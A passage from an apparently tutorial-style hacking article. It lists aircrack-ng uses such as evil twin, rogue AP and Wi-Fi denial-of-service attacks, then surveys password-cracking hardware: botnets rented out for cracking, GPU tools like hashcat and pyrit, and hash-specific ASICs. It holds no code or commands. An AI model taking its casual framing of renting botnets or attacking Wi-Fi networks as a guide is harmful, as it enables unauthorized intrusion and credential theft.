  1. Creating a Soft AP
  2. Creating an Evil Twin
  3. Creating a Rogue AP
  4. Conducting a DOS attack against a Wi-Fi AP
It is only available for Linux and requires a bit of a learning curve to master, but you will be richly rewarded for the time spent learning it. In addition, to be most effective you will need to use an aircrack-ng compatible wireless card, so check their extensive list before buying your card. You can find more info on aircrack-ng over in my Wi-Fi hacking series.
Aircrack-ng is built into BackTrack and Kali and can be downloaded here.

Step 6Password Cracking Hardware

Botnet

Password cracking is simply a function of brute computing power. What one machine can do in one hour, two machines can do in half an hour, and the same principle applies to a whole network of machines. Imagine what you could do with a network of one million machines!
Some of the botnets around the globe are more than a million machines strong and are available for rent to crack passwords. If a password would take one year to crack on your single CPU, a million-machine botnet cuts that to roughly one millionth of the time, about 30 seconds (assuming the work splits evenly across the machines).

GPU

GPUs, or graphics processing units, are far more parallel than a CPU and are therefore much faster both at rendering graphics and at hashing millions of candidates at once. Kali ships tools built for this, namely cudahashcat, oclhashcat, and pyrit (the first two have since been merged into a single hashcat binary that drives NVIDIA, AMD and CPU devices alike). Look for coming tutorials on using these tools and the GPU on your high-end video card to accelerate your password cracking.

ASIC

In recent years, some devices have been developed specifically for hardware hashing. These application-specific devices can compute their one target hash faster than over 100 CPUs working in parallel. The catch is in the name: the boards pictured below are Bitcoin miners wired for SHA-256, and an ASIC helps with password cracking only for the exact hash function it was built to compute.
(1) Bitfury boards by Black Arrow, (2) Butterfly Labs processor, (3) Inside the Butterfly Labs Monarch.